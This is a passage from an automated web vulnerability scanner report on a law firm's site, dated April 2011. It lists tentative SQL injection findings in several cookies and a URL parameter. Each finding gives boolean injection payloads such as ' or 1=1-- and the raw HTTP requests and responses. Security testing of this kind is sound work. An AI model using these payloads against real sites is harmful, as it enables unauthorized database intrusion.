
<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>



<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...

1.22. http://www.curtis.com/favicon.ico [CFTOKEN cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/favicon.ico

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 57319298%20or%201%3d1--%20 and 57319298%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=3257569757319298%20or%201%3d1--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Sun, 18-Apr-2010 17:01:01 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=3257569757319298%20or%201%3d2--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175943;path=/
Set-Cookie: CFTOKEN=60929706;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>



<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...

1.23. http://www.curtis.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 67004861'%20or%201%3d1--%20 and 67004861'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico67004861'%20or%201%3d1--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /favicon.ico67004861'%20or%201%3d2--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>



<script type="text/javascript">

</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.24. http://www.curtis.com/favicon.ico [__utma cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/favicon.ico

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 11177873'%20or%201%3d1--%20 and 11177873'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.111177873'%20or%201%3d1--%20; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Sun, 18-Apr-2010 17:01:02 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.111177873'%20or%201%3d2--%20; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>



<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...

1.25. http://www.curtis.com/favicon.ico [__utmb cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/favicon.ico

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads 20486949'%20or%201%3d1--%20 and 20486949'%20or%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.130314580320486949'%20or%201%3d1--%20; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMB=;expires=Sun, 18-Apr-2010 17:01:20 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.130314580320486949'%20or%201%3d2--%20; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>



<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...

1.26. http://www.curtis.com/favicon.ico [__utmc cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/favicon.ico

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 35245083%20or%201%3d1--%20 and 35245083%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=12670236735245083%20or%201%3d1--%20; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Sun, 18-Apr-2010 17:01:11 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=12670236735245083%20or%201%3d2--%20; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>



<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...

1.27. http://www.curtis.com/favicon.ico [__utmz cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/favicon.ico

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 16393691'%20or%201%3d1--%20 and 16393691'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)16393691'%20or%201%3d1--%20; CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:00:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Sun, 18-Apr-2010 17:00:42 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)16393691'%20or%201%3d2--%20; CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:00:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>



<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...

1.28. http://www.curtis.com/favicon.ico [sifrFetch cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/favicon.ico

Issue detail

The sifrFetch cookie appears to be vulnerable to SQL injection attacks. The payloads 10585096'%20or%201%3d1--%20 and 10585096'%20or%201%3d2--%20 were each submitted in the sifrFetch cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true10585096'%20or%201%3d1--%20; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:00:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SIFRFETCH=;expires=Sun, 18-Apr-2010 17:00:31 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
